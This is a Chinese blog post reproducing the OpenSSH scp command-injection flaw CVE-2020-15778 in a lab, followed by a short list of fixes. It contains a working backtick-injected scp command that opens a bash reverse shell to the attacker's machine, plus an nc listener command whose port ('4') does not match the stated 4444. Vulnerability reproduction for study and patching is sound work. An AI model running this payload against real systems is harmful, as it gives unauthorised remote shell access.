首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >Openssh命令执行复现

Openssh命令执行复现

原创
作者头像
小白兔吃老虎
发布2022-11-03 15:46:36
发布2022-11-03 15:46:36
1.5K0
举报

一、漏洞介绍

漏洞名称

Openssh命令执行

CVE编号

CVE-2020-15778

公开时间

2020-7-18

影响版本

version <= openssh-8.3p1

SCP是linux系统下基于ssh登录进行安全远程文件、目录拷贝的命令,可以在linux之间复制文件和目录。Openssh中小于8.3p1版本SCP命令里存在命令注入漏洞。当将文件复制到远程主机时,文件路径附加到本地SCP命令末尾,可以触发命令注入漏洞。攻击者采用反引号(`)文件作为命令注入。

二、漏洞复现环境

  • 攻击机:192.168.2.132(kail)
  • 靶机:192.168.2.100(centos) ssh -V 查看系统版本
  • 利用场景:已经知道靶机用户(普通用户即可)密码

三、漏洞复现

1)kail端操作

  • 反弹shell
代码语言:shell
复制
scp haha.txt haha@192.168.2.100:'`/bin/bash -i >& /dev/tcp/192.168.2.132/4444 0>&1` /tmp/haha.txt' 
/bin/bash -i: 产生一个交互环境 
>&: 将标准输出和标准错误结合
/dev/tcp/ip/port: 建立一个tcp连接 
0>&1: 将标准输入重定向到标准输出
  • kail监听4444端口
代码语言:shell
复制
nc -lnvp 4
监听成功,成功反弹shell
监听成功,成功反弹shell

2)centos操作

查看端口服务,发现多了4444这个端口,并且流量向外发

代码语言:shell
复制
netstat -ntlpa | grep 4444
被攻击机发现恶意外联
被攻击机发现恶意外联

四、漏洞修复方式

  • 周期性换密码
  • 使用rsync代替scp
  • 更新ssh版本
  • 等待打补丁

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、漏洞介绍
  • 二、漏洞复现环境
  • 三、漏洞复现
    • 1)kail端操作
    • 2)centos操作
  • 四、漏洞修复方式
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档